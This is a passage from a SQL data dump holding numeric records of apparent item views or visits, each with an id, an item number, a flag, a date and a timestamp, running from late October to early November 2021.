08:36:21'),(37171,89,1,'2021-10-27','2021-10-27 08:37:30'),(37172,3083,1,'2021-10-27','2021-10-27 08:38:48'),(37173,1602,1,'2021-10-27','2021-10-27 08:43:51'),(37174,89,1,'2021-10-27','2021-10-27 08:49:49'),(37175,89,1,'2021-10-27','2021-10-27 08:50:29'),(37176,1614,1,'2021-10-27','2021-10-27 08:50:54'),(37177,89,1,'2021-10-27','2021-10-27 08:52:34'),(37178,1612,1,'2021-10-27','2021-10-27 08:52:49'),(37179,89,1,'2021-10-27','2021-10-27 08:54:39'),(37180,2965,1,'2021-10-27','2021-10-27 08:54:57'),(37181,89,1,'2021-10-27','2021-10-27 08:59:14'),(37182,2964,1,'2021-10-27','2021-10-27 08:59:25'),(37183,89,1,'2021-10-27','2021-10-27 09:00:11'),(37184,2457,1,'2021-10-27','2021-10-27 09:00:41'),(37185,89,1,'2021-10-27','2021-10-27 09:08:41'),(37186,1612,1,'2021-10-27','2021-10-27 09:08:54'),(37187,89,1,'2021-10-27','2021-10-27 09:15:54'),(37188,1614,1,'2021-10-27','2021-10-27 09:16:00'),(37189,89,1,'2021-10-27','2021-10-27 09:50:41'),(37190,89,1,'2021-10-27','2021-10-27 09:50:45'),(37191,1612,1,'2021-10-27','2021-10-27 10:19:08'),(37192,1582,1,'2021-10-27','2021-10-27 11:31:50'),(37193,2457,1,'2021-10-27','2021-10-27 11:33:11'),(37194,2457,1,'2021-10-27','2021-10-27 12:56:38'),(37195,2154,1,'2021-10-27','2021-10-27 13:00:20'),(37196,1600,1,'2021-10-27','2021-10-27 13:22:12'),(37197,72,1,'2021-10-27','2021-10-27 13:28:09'),(37198,76,1,'2021-10-27','2021-10-27 13:43:59'),(37199,108,1,'2021-10-27','2021-10-27 13:51:22'),(37200,1612,1,'2021-10-27','2021-10-27 13:57:11'),(37201,2457,1,'2021-10-27','2021-10-27 14:02:01'),(37202,2704,1,'2021-10-27','2021-10-27 14:35:58'),(37203,1602,1,'2021-10-27','2021-10-27 14:44:54'),(37204,80,1,'2021-10-27','2021-10-27 14:45:31'),(37205,1602,1,'2021-10-27','2021-10-27 14:54:29'),(37206,2297,1,'2021-10-27','2021-10-27 15:51:29'),(37207,68,1,'2021-10-27','2021-10-27 16:39:43'),(37208,4396,1,'2021-10-27','2021-10-27 16:46:21'),(37209,3030,1,'2021-10-27','2021-10-27 16:59:11'),(37210,1588,1,'2021-10-27','2021-10-27 17:03:07'),(37211,1606,1,'2021-10-27','2021-10-27 17:03:11'),(37212,1734,1,'2021-10-27','2021-10-27 17:03:57'),(37213,2297,1,'2021-10-27','2021-10-27 17:12:32'),(37214,91,1,'2021-10-27','2021-10-27 17:29:54'),(37215,1612,1,'2021-10-27','2021-10-27 18:23:16'),(37216,1614,1,'2021-10-27','2021-10-27 18:24:54'),(37217,1766,1,'2021-10-27','2021-10-27 19:35:10'),(37218,4335,1,'2021-10-27','2021-10-27 20:09:01'),(37219,1598,1,'2021-10-27','2021-10-27 20:18:01'),(37220,1604,1,'2021-10-27','2021-10-27 20:26:38'),(37221,1610,1,'2021-10-27','2021-10-27 20:35:17'),(37222,1606,1,'2021-10-27','2021-10-27 21:05:45'),(37223,91,1,'2021-10-27','2021-10-27 21:08:26'),(37224,72,1,'2021-10-27','2021-10-27 21:12:35'),(37225,1766,1,'2021-10-27','2021-10-27 21:20:27'),(37226,1608,1,'2021-10-27','2021-10-27 21:30:46'),(37227,2704,1,'2021-10-27','2021-10-27 23:30:09'),(37228,3102,1,'2021-10-28','2021-10-28 00:02:00'),(37229,1610,1,'2021-10-28','2021-10-28 00:31:11'),(37230,68,1,'2021-10-28','2021-10-28 00:31:16'),(37231,3691,1,'2021-10-28','2021-10-28 01:47:09'),(37232,2309,1,'2021-10-28','2021-10-28 02:49:16'),(37233,2309,1,'2021-10-28','2021-10-28 03:35:24'),(37234,3006,1,'2021-10-28','2021-10-28 04:39:42'),(37235,2159,1,'2021-10-28','2021-10-28 04:50:08'),(37236,1606,1,'2021-10-28','2021-10-28 04:50:28'),(37237,3030,1,'2021-10-28','2021-10-28 05:31:06'),(37238,2297,1,'2021-10-28','2021-10-28 05:38:50'),(37239,3030,1,'2021-10-28','2021-10-28 05:44:18'),(37240,72,1,'2021-10-28','2021-10-28 06:11:12'),(37241,1614,1,'2021-10-28','2021-10-28 06:57:39'),(37242,1604,1,'2021-10-28','2021-10-28 07:40:28'),(37243,477,1,'2021-10-28','2021-10-28 09:05:50'),(37244,2309,1,'2021-10-28','2021-10-28 09:39:42'),(37245,477,1,'2021-10-28','2021-10-28 09:46:13'),(37246,2165,1,'2021-10-28','2021-10-28 09:47:07'),(37247,3273,1,'2021-10-28','2021-10-28 09:53:34'),(37248,3273,1,'2021-10-28','2021-10-28 09:53:34'),(37249,3273,1,'2021-10-28','2021-10-28 09:53:35'),(37250,3280,1,'2021-10-28','2021-10-28 09:53:53'),(37251,3273,1,'2021-10-28','2021-10-28 09:54:57'),(37252,1604,1,'2021-10-28','2021-10-28 10:18:25'),(37253,2297,1,'2021-10-28','2021-10-28 10:35:14'),(37254,80,1,'2021-10-28','2021-10-28 11:23:01'),(37255,4363,1,'2021-10-28','2021-10-28 11:53:19'),(37256,3030,1,'2021-10-28','2021-10-28 12:23:37'),(37257,87,1,'2021-10-28','2021-10-28 12:50:07'),(37258,486,1,'2021-10-28','2021-10-28 12:50:49'),(37259,87,1,'2021-10-28','2021-10-28 12:51:03'),(37260,488,1,'2021-10-28','2021-10-28 12:51:11'),(37261,87,1,'2021-10-28','2021-10-28 12:51:17'),(37262,480,1,'2021-10-28','2021-10-28 12:51:22'),(37263,479,1,'2021-10-28','2021-10-28 12:51:33'),(37264,478,1,'2021-10-28','2021-10-28 12:51:39'),(37265,479,1,'2021-10-28','2021-10-28 12:51:43'),(37266,480,1,'2021-10-28','2021-10-28 12:51:46'),(37267,87,1,'2021-10-28','2021-10-28 12:51:49'),(37268,473,1,'2021-10-28','2021-10-28 12:52:01'),(37269,89,1,'2021-10-28','2021-10-28 12:52:14'),(37270,473,1,'2021-10-28','2021-10-28 12:52:21'),(37271,91,1,'2021-10-28','2021-10-28 12:52:26'),(37272,87,1,'2021-10-28','2021-10-28 12:52:50'),(37273,4436,1,'2021-10-28','2021-10-28 13:21:13'),(37274,3030,1,'2021-10-28','2021-10-28 13:21:28'),(37275,1614,1,'2021-10-28','2021-10-28 13:22:28'),(37276,4436,1,'2021-10-28','2021-10-28 13:22:44'),(37277,4436,1,'2021-10-28','2021-10-28 13:25:29'),(37278,4436,1,'2021-10-28','2021-10-28 13:26:29'),(37279,1582,1,'2021-10-28','2021-10-28 13:38:53'),(37280,3030,1,'2021-10-28','2021-10-28 13:48:21'),(37281,1582,1,'2021-10-28','2021-10-28 14:39:26'),(37282,472,1,'2021-10-28','2021-10-28 14:46:56'),(37283,4457,1,'2021-10-28','2021-10-28 15:09:30'),(37284,2159,1,'2021-10-28','2021-10-28 15:34:36'),(37285,4404,1,'2021-10-28','2021-10-28 15:35:04'),(37286,3006,1,'2021-10-28','2021-10-28 15:58:48'),(37287,1776,1,'2021-10-28','2021-10-28 20:01:11'),(37288,4335,1,'2021-10-28','2021-10-28 20:49:40'),(37289,4301,1,'2021-10-28','2021-10-28 21:32:10'),(37290,3710,1,'2021-10-28','2021-10-28 21:43:12'),(37291,1602,1,'2021-10-29','2021-10-29 00:11:23'),(37292,1608,1,'2021-10-29','2021-10-29 00:28:19'),(37293,1602,1,'2021-10-29','2021-10-29 00:34:49'),(37294,1586,1,'2021-10-29','2021-10-29 02:08:34'),(37295,2309,1,'2021-10-29','2021-10-29 03:22:30'),(37296,1588,1,'2021-10-29','2021-10-29 03:34:09'),(37297,2297,1,'2021-10-29','2021-10-29 03:36:27'),(37298,72,1,'2021-10-29','2021-10-29 03:45:37'),(37299,1768,1,'2021-10-29','2021-10-29 03:50:05'),(37300,3117,1,'2021-10-29','2021-10-29 04:29:03'),(37301,1612,1,'2021-10-29','2021-10-29 05:03:22'),(37302,3006,1,'2021-10-29','2021-10-29 05:34:35'),(37303,1768,1,'2021-10-29','2021-10-29 05:47:58'),(37304,3006,1,'2021-10-29','2021-10-29 06:40:13'),(37305,3006,1,'2021-10-29','2021-10-29 06:40:32'),(37306,2457,1,'2021-10-29','2021-10-29 07:56:47'),(37307,2154,1,'2021-10-29','2021-10-29 08:06:42'),(37308,80,1,'2021-10-29','2021-10-29 08:40:10'),(37309,4436,1,'2021-10-29','2021-10-29 08:40:45'),(37310,4436,1,'2021-10-29','2021-10-29 09:15:11'),(37311,1586,1,'2021-10-29','2021-10-29 09:15:22'),(37312,4436,1,'2021-10-29','2021-10-29 09:16:33'),(37313,2154,1,'2021-10-29','2021-10-29 09:48:00'),(37314,2154,1,'2021-10-29','2021-10-29 09:49:07'),(37315,2154,1,'2021-10-29','2021-10-29 09:53:05'),(37316,2154,1,'2021-10-29','2021-10-29 09:53:36'),(37317,2154,1,'2021-10-29','2021-10-29 09:53:45'),(37318,2154,1,'2021-10-29','2021-10-29 09:54:18'),(37319,87,1,'2021-10-29','2021-10-29 09:59:43'),(37320,2154,1,'2021-10-29','2021-10-29 10:03:53'),(37321,2154,1,'2021-10-29','2021-10-29 10:04:17'),(37322,80,1,'2021-10-29','2021-10-29 10:32:24'),(37323,4436,1,'2021-10-29','2021-10-29 10:35:56'),(37324,2154,1,'2021-10-29','2021-10-29 10:38:07'),(37325,2154,1,'2021-10-29','2021-10-29 10:39:00'),(37326,2154,1,'2021-10-29','2021-10-29 10:39:31'),(37327,2154,1,'2021-10-29','2021-10-29 10:39:43'),(37328,2154,1,'2021-10-29','2021-10-29 10:40:09'),(37329,2904,1,'2021-10-29','2021-10-29 10:40:45'),(37330,2154,1,'2021-10-29','2021-10-29 10:41:00'),(37331,4436,1,'2021-10-29','2021-10-29 10:44:07'),(37332,4436,1,'2021-10-29','2021-10-29 10:46:12'),(37333,4436,1,'2021-10-29','2021-10-29 10:51:12'),(37334,4436,1,'2021-10-29','2021-10-29 10:54:48'),(37335,4436,1,'2021-10-29','2021-10-29 10:57:16'),(37336,4396,1,'2021-10-29','2021-10-29 11:47:15'),(37337,72,1,'2021-10-29','2021-10-29 11:48:45'),(37338,1608,1,'2021-10-29','2021-10-29 12:15:25'),(37339,1608,1,'2021-10-29','2021-10-29 12:22:58'),(37340,87,1,'2021-10-29','2021-10-29 12:46:13'),(37341,2309,1,'2021-10-29','2021-10-29 13:06:34'),(37342,1768,1,'2021-10-29','2021-10-29 13:07:55'),(37343,1582,1,'2021-10-29','2021-10-29 13:23:50'),(37344,3006,1,'2021-10-29','2021-10-29 13:42:10'),(37345,1772,1,'2021-10-29','2021-10-29 13:43:42'),(37346,1772,1,'2021-10-29','2021-10-29 13:44:59'),(37347,1720,1,'2021-10-29','2021-10-29 13:51:53'),(37348,1720,1,'2021-10-29','2021-10-29 13:52:36'),(37349,1772,1,'2021-10-29','2021-10-29 14:05:35'),(37350,1772,1,'2021-10-29','2021-10-29 14:06:12'),(37351,2751,1,'2021-10-29','2021-10-29 14:50:05'),(37352,3038,1,'2021-10-29','2021-10-29 14:52:00'),(37353,1602,1,'2021-10-29','2021-10-29 15:15:20'),(37354,1602,1,'2021-10-29','2021-10-29 15:15:20'),(37355,1602,1,'2021-10-29','2021-10-29 15:15:30'),(37356,1602,1,'2021-10-29','2021-10-29 15:16:50'),(37357,1602,1,'2021-10-29','2021-10-29 15:17:06'),(37358,1600,1,'2021-10-29','2021-10-29 15:45:58'),(37359,3006,1,'2021-10-29','2021-10-29 15:57:53'),(37360,87,1,'2021-10-29','2021-10-29 16:04:23'),(37361,3038,1,'2021-10-29','2021-10-29 16:41:20'),(37362,1586,1,'2021-10-29','2021-10-29 16:49:34'),(37363,1586,1,'2021-10-29','2021-10-29 16:49:53'),(37364,1602,1,'2021-10-29','2021-10-29 17:01:22'),(37365,469,1,'2021-10-29','2021-10-29 17:20:52'),(37366,2309,1,'2021-10-29','2021-10-29 17:28:40'),(37367,1602,1,'2021-10-29','2021-10-29 17:28:51'),(37368,3127,1,'2021-10-29','2021-10-29 17:35:54'),(37369,3781,1,'2021-10-29','2021-10-29 18:14:31'),(37370,1614,1,'2021-10-29','2021-10-29 18:18:24'),(37371,1598,1,'2021-10-29','2021-10-29 18:23:44'),(37372,2503,1,'2021-10-29','2021-10-29 19:11:34'),(37373,1600,1,'2021-10-29','2021-10-29 21:31:33'),(37374,1600,1,'2021-10-29','2021-10-29 21:31:34'),(37375,2989,1,'2021-10-29','2021-10-29 21:42:09'),(37376,1612,1,'2021-10-30','2021-10-30 01:05:41'),(37377,1602,1,'2021-10-30','2021-10-30 01:17:03'),(37378,3307,1,'2021-10-30','2021-10-30 01:26:30'),(37379,3004,1,'2021-10-30','2021-10-30 01:40:33'),(37380,3107,1,'2021-10-30','2021-10-30 02:02:28'),(37381,80,1,'2021-10-30','2021-10-30 02:22:01'),(37382,1877,1,'2021-10-30','2021-10-30 02:36:09'),(37383,1602,1,'2021-10-30','2021-10-30 03:04:26'),(37384,1592,1,'2021-10-30','2021-10-30 03:15:51'),(37385,1592,1,'2021-10-30','2021-10-30 03:16:17'),(37386,72,1,'2021-10-30','2021-10-30 03:27:11'),(37387,4457,1,'2021-10-30','2021-10-30 03:27:32'),(37388,3781,1,'2021-10-30','2021-10-30 03:36:39'),(37389,3006,1,'2021-10-30','2021-10-30 05:11:45'),(37390,1598,1,'2021-10-30','2021-10-30 05:19:51'),(37391,2813,1,'2021-10-30','2021-10-30 05:24:12'),(37392,2769,1,'2021-10-30','2021-10-30 05:25:17'),(37393,1588,1,'2021-10-30','2021-10-30 05:26:47'),(37394,1720,1,'2021-10-30','2021-10-30 05:37:57'),(37395,1588,1,'2021-10-30','2021-10-30 05:38:35'),(37396,1606,1,'2021-10-30','2021-10-30 05:54:42'),(37397,1606,1,'2021-10-30','2021-10-30 05:55:56'),(37398,3787,1,'2021-10-30','2021-10-30 05:59:14'),(37399,3038,1,'2021-10-30','2021-10-30 06:09:09'),(37400,3038,1,'2021-10-30','2021-10-30 06:09:59'),(37401,1720,1,'2021-10-30','2021-10-30 06:33:56'),(37402,1768,1,'2021-10-30','2021-10-30 06:36:45'),(37403,1728,1,'2021-10-30','2021-10-30 06:53:46'),(37404,1749,1,'2021-10-30','2021-10-30 06:58:53'),(37405,1749,1,'2021-10-30','2021-10-30 06:59:35'),(37406,3764,1,'2021-10-30','2021-10-30 07:30:24'),(37407,2704,1,'2021-10-30','2021-10-30 07:37:35'),(37408,2804,1,'2021-10-30','2021-10-30 07:53:46'),(37409,2309,1,'2021-10-30','2021-10-30 07:54:50'),(37410,2156,1,'2021-10-30','2021-10-30 08:58:30'),(37411,2156,1,'2021-10-30','2021-10-30 09:06:59'),(37412,3273,1,'2021-10-30','2021-10-30 09:29:16'),(37413,3273,1,'2021-10-30','2021-10-30 09:29:38'),(37414,3273,1,'2021-10-30','2021-10-30 09:29:52'),(37415,3273,1,'2021-10-30','2021-10-30 09:30:12'),(37416,3280,1,'2021-10-30','2021-10-30 09:31:06'),(37417,3280,1,'2021-10-30','2021-10-30 09:31:27'),(37418,1544,1,'2021-10-30','2021-10-30 11:38:18'),(37419,4301,1,'2021-10-30','2021-10-30 11:53:12'),(37420,80,1,'2021-10-30','2021-10-30 11:53:41'),(37421,3226,1,'2021-10-30','2021-10-30 12:11:41'),(37422,3226,1,'2021-10-30','2021-10-30 12:48:39'),(37423,3030,1,'2021-10-30','2021-10-30 13:42:53'),(37424,1606,1,'2021-10-30','2021-10-30 15:19:19'),(37425,1606,1,'2021-10-30','2021-10-30 15:21:31'),(37426,1614,1,'2021-10-30','2021-10-30 15:31:44'),(37427,1606,1,'2021-10-30','2021-10-30 15:34:16'),(37428,1598,1,'2021-10-30','2021-10-30 15:52:19'),(37429,2309,1,'2021-10-30','2021-10-30 16:03:12'),(37430,2904,1,'2021-10-30','2021-10-30 16:28:49'),(37431,1544,1,'2021-10-30','2021-10-30 16:51:27'),(37432,3006,1,'2021-10-30','2021-10-30 17:04:26'),(37433,3006,1,'2021-10-30','2021-10-30 17:05:37'),(37434,472,1,'2021-10-30','2021-10-30 17:06:01'),(37435,2813,1,'2021-10-30','2021-10-30 17:08:15'),(37436,3781,1,'2021-10-30','2021-10-30 17:21:43'),(37437,1768,1,'2021-10-30','2021-10-30 17:32:09'),(37438,3764,1,'2021-10-30','2021-10-30 17:32:51'),(37439,1768,1,'2021-10-30','2021-10-30 17:39:38'),(37440,2904,1,'2021-10-30','2021-10-30 17:39:42'),(37441,1594,1,'2021-10-30','2021-10-30 17:42:56'),(37442,2769,1,'2021-10-30','2021-10-30 17:58:35'),(37443,87,1,'2021-10-30','2021-10-30 18:14:48'),(37444,3316,1,'2021-10-30','2021-10-30 18:36:24'),(37445,1602,1,'2021-10-30','2021-10-30 18:41:59'),(37446,91,1,'2021-10-30','2021-10-30 19:01:11'),(37447,72,1,'2021-10-30','2021-10-30 19:37:32'),(37448,1544,1,'2021-10-30','2021-10-30 20:03:34'),(37449,4457,1,'2021-10-30','2021-10-30 20:27:58'),(37450,91,1,'2021-10-30','2021-10-30 20:28:34'),(37451,91,1,'2021-10-30','2021-10-30 20:29:14'),(37452,91,1,'2021-10-30','2021-10-30 20:29:59'),(37453,4457,1,'2021-10-30','2021-10-30 20:30:05'),(37454,477,1,'2021-10-30','2021-10-30 20:36:41'),(37455,1596,1,'2021-10-30','2021-10-30 20:39:26'),(37456,1596,1,'2021-10-30','2021-10-30 20:40:37'),(37457,2751,1,'2021-10-30','2021-10-30 21:04:58'),(37458,1608,1,'2021-10-30','2021-10-30 21:06:57'),(37459,3060,1,'2021-10-30','2021-10-30 21:30:55'),(37460,1582,1,'2021-10-30','2021-10-30 23:42:33'),(37461,1594,1,'2021-10-31','2021-10-31 01:24:41'),(37462,472,1,'2021-10-31','2021-10-31 01:29:15'),(37463,2309,1,'2021-10-31','2021-10-31 02:00:36'),(37464,2769,1,'2021-10-31','2021-10-31 02:47:29'),(37465,2769,1,'2021-10-31','2021-10-31 02:47:30'),(37466,1606,1,'2021-10-31','2021-10-31 03:53:49'),(37467,1544,1,'2021-10-31','2021-10-31 04:15:14'),(37468,2813,1,'2021-10-31','2021-10-31 04:48:27'),(37469,1544,1,'2021-10-31','2021-10-31 05:02:33'),(37470,3781,1,'2021-10-31','2021-10-31 05:07:30'),(37471,3482,1,'2021-10-31','2021-10-31 05:17:49'),(37472,1732,1,'2021-10-31','2021-10-31 05:28:39'),(37473,469,1,'2021-10-31','2021-10-31 05:45:29'),(37474,1732,1,'2021-10-31','2021-10-31 05:45:58'),(37475,1600,1,'2021-10-31','2021-10-31 06:51:41'),(37476,1600,1,'2021-10-31','2021-10-31 06:52:13'),(37477,1612,1,'2021-10-31','2021-10-31 07:09:38'),(37478,1612,1,'2021-10-31','2021-10-31 07:35:44'),(37479,87,1,'2021-10-31','2021-10-31 07:36:07'),(37480,4368,1,'2021-10-31','2021-10-31 10:00:36'),(37481,1594,1,'2021-10-31','2021-10-31 10:50:03'),(37482,2748,1,'2021-10-31','2021-10-31 11:18:00'),(37483,2813,1,'2021-10-31','2021-10-31 11:30:37'),(37484,4368,1,'2021-10-31','2021-10-31 11:34:09'),(37485,1592,1,'2021-10-31','2021-10-31 13:48:36'),(37486,4408,1,'2021-10-31','2021-10-31 14:29:29'),(37487,2410,1,'2021-10-31','2021-10-31 14:39:31'),(37488,72,1,'2021-10-31','2021-10-31 15:26:46'),(37489,1602,1,'2021-10-31','2021-10-31 15:57:15'),(37490,1602,1,'2021-10-31','2021-10-31 16:00:05'),(37491,1544,1,'2021-10-31','2021-10-31 17:10:48'),(37492,4412,1,'2021-10-31','2021-10-31 17:11:23'),(37493,4404,1,'2021-10-31','2021-10-31 17:22:06'),(37494,80,1,'2021-10-31','2021-10-31 17:42:44'),(37495,68,1,'2021-10-31','2021-10-31 17:42:49'),(37496,108,1,'2021-10-31','2021-10-31 17:42:59'),(37497,1544,1,'2021-10-31','2021-10-31 18:46:02'),(37498,72,1,'2021-10-31','2021-10-31 19:34:46'),(37499,3781,1,'2021-10-31','2021-10-31 20:19:33'),(37500,1606,1,'2021-10-31','2021-10-31 20:31:26'),(37501,1612,1,'2021-10-31','2021-10-31 20:44:39'),(37502,91,1,'2021-10-31','2021-10-31 20:45:32'),(37503,4444,1,'2021-10-31','2021-10-31 20:46:22'),(37504,1612,1,'2021-10-31','2021-10-31 20:47:18'),(37505,108,1,'2021-10-31','2021-10-31 20:58:10'),(37506,1612,1,'2021-10-31','2021-10-31 21:13:01'),(37507,4457,1,'2021-10-31','2021-10-31 21:38:59'),(37508,3109,1,'2021-10-31','2021-10-31 23:34:46'),(37509,3482,1,'2021-11-01','2021-11-01 00:04:48'),(37510,2813,1,'2021-11-01','2021-11-01 00:36:28'),(37511,1600,1,'2021-11-01','2021-11-01 01:07:02'),(37512,1582,1,'2021-11-01','2021-11-01 01:55:13'),(37513,1592,1,'2021-11-01','2021-11-01 02:00:59'),(37514,2457,1,'2021-11-01','2021-11-01 02:04:36'),(37515,1732,1,'2021-11-01','2021-11-01 02:12:06'),(37516,1732,1,'2021-11-01','2021-11-01 02:12:49'),(37517,4432,1,'2021-11-01','2021-11-01 03:44:37'),(37518,4432,1,'2021-11-01','2021-11-01 03:45:55'),(37519,3664,1,'2021-11-01','2021-11-01 05:04:02'),(37520,3764,1,'2021-11-01','2021-11-01 07:35:10'),(37521,3259,1,'2021-11-01','2021-11-01 08:55:19'),(37522,1588,1,'2021-11-01','2021-11-01 09:30:54'),(37523,1592,1,'2021-11-01','2021-11-01 09:54:21'),(37524,2813,1,'2021-11-01','2021-11-01 10:32:32'),(37525,2410,1,'2021-11-01','2021-11-01 10:36:55'),(37526,2410,1,'2021-11-01','2021-11-01 10:38:02'),(37527,1594,1,'2021-11-01','2021-11-01 10:48:50'),(37528,487,1,'2021-11-01','2021-11-01 10:51:47'),(37529,1586,1,'2021-11-01','2021-11-01 10:57:01'),(37530,76,1,'2021-11-01','2021-11-01 11:24:56'),(37531,3257,1,'2021-11-01','2021-11-01 11:34:20'),(37532,2804,1,'2021-11-01','2021-11-01 11:41:34'),(37533,1598,1,'2021-11-01','2021-11-01 11:52:52'),(37534,4323,1,'2021-11-01','2021-11-01 11:55:10'),(37535,80,1,'2021-11-01','2021-11-01 11:55:38'),(37536,80,1,'2021-11-01','2021-11-01 11:55:41'),(37537,80,1,'2021-11-01','2021-11-01 11:55:42'),(37538,80,1,'2021-11-01','2021-11-01 11:57:52'),(37539,4323,1,'2021-11-01','2021-11-01 12:01:02'),(37540,80,1,'2021-11-01','2021-11-01 12:02:05'),(37541,80,1,'2021-11-01','2021-11-01 12:03:14'),(37542,4323,1,'2021-11-01','2021-11-01 12:03:51'),(37543,4323,1,'2021-11-01','2021-11-01 12:04:52'),(37544,469,1,'2021-11-01','2021-11-01 12:29:57'),(37545,1598,1,'2021-11-01','2021-11-01 12:48:19'),(37546,2309,1,'2021-11-01','2021-11-01 12:48:22'),(37547,1594,1,'2021-11-01','2021-11-01 13:03:22'),(37548,1598,1,'2021-11-01','2021-11-01 13:16:04'),(37549,91,1,'2021-11-01','2021-11-01 13:16:49'),(37550,1598,1,'2021-11-01','2021-11-01 13:18:00'),(37551,1598,1,'2021-11-01','2021-11-01 13:18:48'),(37552,80,1,'2021-11-01','2021-11-01 13:23:33'),(37553,80,1,'2021-11-01','2021-11-01 13:28:00'),(37554,2457,1,'2021-11-01','2021-11-01 13:51:47'),(37555,2457,1,'2021-11-01','2021-11-01 14:23:58'),(37556,80,1,'2021-11-01','2021-11-01 14:34:13'),(37557,1608,1,'2021-11-01','2021-11-01 15:50:55'),(37558,1600,1,'2021-11-01','2021-11-01 16:17:19'),(37559,1718,1,'2021-11-01','2021-11-01 17:04:08'),(37560,1612,1,'2021-11-01','2021-11-01 17:05:59'),(37561,2457,1,'2021-11-01','2021-11-01 17:30:16'),(37562,72,1,'2021-11-01','2021-11-01 17:33:56'),(37563,1703,1,'2021-11-01','2021-11-01 17:40:41'),(37564,1703,1,'2021-11-01','2021-11-01 17:40:58'),(37565,2813,1,'2021-11-01','2021-11-01 17:43:11'),(37566,2410,1,'2021-11-01','2021-11-01 18:08:15'),(37567,1774,1,'2021-11-01','2021-11-01 18:11:39'),(37568,2248,1,'2021-11-01','2021-11-01 18:33:57'),(37569,2309,1,'2021-11-01','2021-11-01 18:59:54'),(37570,1594,1,'2021-11-01','2021-11-01 19:59:43'),(37571,1602,1,'2021-11-01','2021-11-01 20:58:57'),(37572,1602,1,'2021-11-01','2021-11-01 21:13:26'),(37573,2457,1,'2021-11-01','2021-11-01 21:28:16'),(37574,1602,1,'2021-11-01','2021-11-01 21:45:34'),(37575,2248,1,'2021-11-01','2021-11-01 22:43:08'),(37576,1718,1,'2021-11-01','2021-11-01 23:18:24'),(37577,2609,1,'2021-11-01','2021-11-01 23:37:44'),(37578,2609,1,'2021-11-01','2021-11-01 23:37:56'),(37579,2609,1,'2021-11-01','2021-11-01 23:38:09'),(37580,2609,1,'2021-11-01','2021-11-01 23:38:29'),(37581,1602,1,'2021-11-02','2021-11-02 01:21:19'),(37582,1602,1,'2021-11-02','2021-11-02 01:22:20'),(37583,1602,1,'2021-11-02','2021-11-02 01:26:36'),(37584,72,1,'2021-11-02','2021-11-02 02:20:13'),(37585,1602,1,'2021-11-02','2021-11-02 03:09:52'),(37586,2410,1,'2021-11-02','2021-11-02 04:50:36'),(37587,1596,1,'2021-11-02','2021-11-02 05:46:02'),(37588,68,1,'2021-11-02','2021-11-02 06:21:41'),(37589,80,1,'2021-11-02','2021-11-02 08:17:35'),(37590,80,1,'2021-11-02','2021-11-02 08:17:38'),(37591,470,1,'2021-11-02','2021-11-02 09:21:33'),(37592,1600,1,'2021-11-02','2021-11-02 10:19:28'),(37593,108,1,'2021-11-02','2021-11-02 10:29:49'),(37594,1594,1,'2021-11-02','2021-11-02 10:59:30'),(37595,1594,1,'2021-11-02','2021-11-02 11:30:10'),(37596,1588,1,'2021-11-02','2021-11-02 11:37:35'),(37597,108,1,'2021-11-02','2021-11-02 11:38:09'),(37598,3226,1,'2021-11-02','2021-11-02 11:51:23'),(37599,3226,1,'2021-11-02','2021-11-02 11:53:19'),(37600,1600,1,'2021-11-02','2021-11-02 12:23:42'),(37601,1612,1,'2021-11-02','2021-11-02 12:45:49'),(37602,91,1,'2021-11-02','2021-11-02 12:46:56'),(37603,76,1,'2021-11-02','2021-11-02 12:47:41'),(37604,91,1,'2021-11-02','2021-11-02 12:48:04'),(37605,1612,1,'2021-11-02','2021-11-02 12:48:06'),(37606,68,1,'2021-11-02','2021-11-02 12:48:17'),(37607,3482,1,'2021-11-02','2021-11-02 12:49:56'),(37608,68,1,'2021-11-02','2021-11-02 13:05:47'),(37609,474,1,'2021-11-02','2021-11-02 14:08:35'),(37610,3226,1,'2021-11-02','2021-11-02 14:55:52'),(37611,91,1,'2021-11-02','2021-11-02 14:56:32'),(37612,3226,1,'2021-11-02','2021-11-02 14:57:10'),(37613,4457,1,'2021-11-02','2021-11-02 15:07:39'),(37614,4457,1,'2021-11-02','2021-11-02 15:09:05'),(37615,2813,1,'2021-11-02','2021-11-02 15:26:11'),(37616,4457,1,'2021-11-02','2021-11-02 15:46:46'),(37617,1598,1,'2021-11-02','2021-11-02 15:48:14'),(37618,1602,1,'2021-11-02','2021-11-02 16:01:27'),(37619,2410,1,'2021-11-02','2021-11-02 16:24:24'),(37620,3127,1,'2021-11-02','2021-11-02 16:45:17'),(37621,1598,1,'2021-11-02','2021-11-02 16:54:08'),(37622,80,1,'2021-11-02','2021-11-02 17:46:24'),(37623,1602,1,'2021-11-02','2021-11-02 17:54:06'),(37624,3290,1,'2021-11-02','2021-11-02 17:58:52'),(37625,1612,1,'2021-11-02','2021-11-02 18:20:39'),(37626,479,1,'2021-11-02','2021-11-02 18:24:42'),(37627,2248,1,'2021-11-02','2021-11-02 18:35:29'),(37628,2248,1,'2021-11-02','2021-11-02 18:36:37'),(37629,1602,1,'2021-11-02','2021-11-02 18:48:08'),(37630,1598,1,'2021-11-02','2021-11-02 19:23:02'),(37631,1544,1,'2021-11-02','2021-11-02 19:47:10'),(37632,2813,1,'2021-11-02','2021-11-02 19:52:58'),(37633,2813,1,'2021-11-02','2021-11-02 19:53:08'),(37634,4457,1,'2021-11-02','2021-11-02 21:19:05'),(37635,80,1,'2021-11-03','2021-11-03 00:02:13'),(37636,4457,1,'2021-11-03','2021-11-03 00:52:35'),(37637,91,1,'2021-11-03','2021-11-03 00:53:24'),(37638,4457,1,'2021-11-03','2021-11-03 00:54:02'),(37639,2309,1,'2021-11-03','2021-11-03 01:21:09'),(37640,1598,1,'2021-11-03','2021-11-03 02:02:13'),(37641,1598,1,'2021-11-03','2021-11-03 02:02:13'),(37642,1598,1,'2021-11-03','2021-11-03 02:02:18'),(37643,1612,1,'2021-11-03','2021-11-03 05:21:31'),(37644,2410,1,'2021-11-03','2021-11-03 05:53:27'),(37645,80,1,'2021-11-03','2021-11-03 06:53:42'),(37646,1596,1,'2021-11-03','2021-11-03 07:46:06'),(37647,4457,1,'2021-11-03','2021-11-03 08:38:24'),(37648,3764,1,'2021-11-03','2021-11-03 09:21:49'),(37649,1606,1,'2021-11-03','2021-11-03 09:24:50'),(37650,2769,1,'2021-11-03','2021-11-03 09:24:59'),(37651,91,1,'2021-11-03','2021-11-03 09:47:20'),(37652,4457,1,'2021-11-03','2021-11-03 10:25:41'),(37653,72,1,'2021-11-03','2021-11-03 11:04:28'),(37654,1602,1,'2021-11-03','2021-11-03 11:16:37'),(37655,2558,1,'2021-11-03','2021-11-03 11:37:18'),(37656,2410,1,'2021-11-03','2021-11-03 11:43:51'),(37657,1602,1,'2021-11-03','2021-11-03 